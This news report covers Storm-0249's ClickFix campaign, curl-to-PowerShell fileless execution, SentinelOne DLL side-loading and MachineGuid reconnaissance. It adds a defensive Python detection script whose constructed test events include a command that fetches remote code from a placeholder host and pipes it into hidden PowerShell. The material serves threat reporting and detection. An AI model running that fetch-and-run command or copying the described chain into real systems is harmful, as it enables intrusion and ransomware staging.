The threat actor known as Storm-0249 is likely to shift from its role as an initial access broker to a combination of more advanced strategies, such as domain spoofing, DLL side-loading, and fileless PowerShell execution, to facilitate ransomware attacks.
“These methods allow them to bypass security, infiltrate networks, maintain persistence, and operate undetected, raising serious concerns for security teams,” ReliaQuest said in a report shared with The Hacker News.
Storm-0249 is the alias assigned by Microsoft to an initial access broker that has given other cybercrime groups, including ransomware and extortion actors like Storm-0501, a foothold in target organizations. It was first documented by the tech giant in September 2024.
Then, earlier this year, Microsoft also detailed a phishing campaign in which the threat actor used tax-related lures to target users in the US ahead of the tax filing season and infected them with Latrodectus and the Brute Ratel C4 (BRC4) post-exploitation framework.
The ultimate goal of these infections is to gain persistent access to various enterprise networks and monetize them by selling them to ransomware gangs, providing them with a ready supply of targets and accelerating the pace of such attacks.
ReliaQuest’s latest findings point to a tactical shift in which Storm-0249 has turned to the infamous ClickFix social engineering technique to trick potential targets into running malicious commands through the Windows Run dialog under the pretext of fixing a technical issue.
In this case, the copied command leverages the legitimate “curl.exe” binary to fetch a PowerShell script from a URL crafted to mimic a Microsoft domain (“sgcipl[.]com/us.Microsoft.com/bdo/”), giving victims a false sense of security, and then executes it in a fileless manner via PowerShell.
This results in the execution of a malicious MSI package with system privileges, which drops a trojanized DLL associated with SentinelOne’s Endpoint Security solution (“SentinelAgentCore.dll”) into the user’s AppData folder along with the legitimate “SentinelAgentWorker.exe” executable.
The idea is to sideload the rogue DLL when the “SentinelAgentWorker.exe” process is launched, thereby hiding the activity behind a trusted security process. The DLL then establishes encrypted communications with a command-and-control (C2) server.
Storm-0249 has also been observed using legitimate Windows administrative utilities such as reg.exe and findstr.exe to extract unique system identifiers such as MachineGuid to lay the groundwork for follow-on ransomware attacks. The use of living-off-the-land (LOTL) tactics, coupled with the fact that these commands are run under the trusted “SentinelAgentWorker.exe” process, means that the activity is unlikely to raise any red flags.
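As an added example that is not part of the ReliaQuest report or this article, the following Python triages constructed Sysmon-style process-creation records for the chain described above: explorer.exe spawning curl.exe against a URL whose path name-drops microsoft.com while the host is something else, curl output piped straight into PowerShell, and reg.exe or findstr.exe reading MachineGuid under a parent that runs from AppData rather than Program Files. The hostname, user paths and rule names are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed Sysmon-style process-creation records (Event ID 1); not real telemetry.
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\curl.exe",
     "cmd": "curl.exe -s https://lookalike-host.example/us.Microsoft.com/bdo/ | powershell -nop -w hidden -"},
    {"parent": r"C:\Users\alice\AppData\Local\Temp\SentinelAgentWorker.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmd": r'reg query "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\curl.exe",
     "cmd": "curl.exe -o report.pdf https://www.microsoft.com/en-us/report.pdf"},
    {"parent": r"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentWorker.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmd": r'reg query "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid'},
]

URL_RE = re.compile(r"https?://\S+", re.I)
APPDATA_RE = re.compile(r"\\AppData\\", re.I)
PIPE_TO_PS_RE = re.compile(r"\|\s*powershell", re.I)


def lookalike_url(cmd):
    """Return the first URL whose path mentions microsoft.com while the host is not microsoft.com."""
    for url in URL_RE.findall(cmd):
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        if "microsoft.com" in parsed.path.lower() and not host.endswith("microsoft.com"):
            return url
    return None


def triage(event):
    """Return the names of the rules a single process-creation record matches."""
    hits = []
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent"]
    cmd = event["cmd"]
    # Rule 1: Run-dialog lure. explorer.exe spawns curl.exe that fetches from a brand-lookalike URL.
    if parent.lower().endswith("\\explorer.exe") and image == "curl.exe" and lookalike_url(cmd):
        hits.append("clickfix_curl_lookalike_url")
    # Rule 2: fileless hand-off: curl output piped straight into powershell, nothing written to disk.
    if image == "curl.exe" and PIPE_TO_PS_RE.search(cmd):
        hits.append("curl_piped_to_powershell")
    # Rule 3: LOTL fingerprinting: reg.exe/findstr.exe reading MachineGuid, parented by an EDR-named
    # binary that runs from AppData instead of Program Files (the sideloaded worker).
    if image in ("reg.exe", "findstr.exe") and "machineguid" in cmd.lower() and APPDATA_RE.search(parent):
        hits.append("machineguid_query_from_appdata_parent")
    return hits


if __name__ == "__main__":
    for i, ev in enumerate(EVENTS):
        print(i, triage(ev))
```

The third and fourth records are deliberate negatives: a genuine Microsoft download and a MachineGuid query from the agent's normal install path match nothing, so the rules key on parent path and URL structure rather than on binary names alone.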
The findings point to a shift away from large-scale phishing campaigns toward targeted attacks that weaponize the trust placed in signed processes to stay under the radar.
“This isn’t just general reconnaissance – it’s preparation for ransomware allies,” ReliaQuest said. “Ransomware groups like LockBit and ALPHV use machine tools to bind encryption keys to individual victim systems.”
“By linking the encryption keys to the machine’s keys, attackers ensure that even if defenders capture the ransomware binary or attempt to reverse-engineer the encryption algorithm, they cannot decrypt the files without the attacker-controlled key.”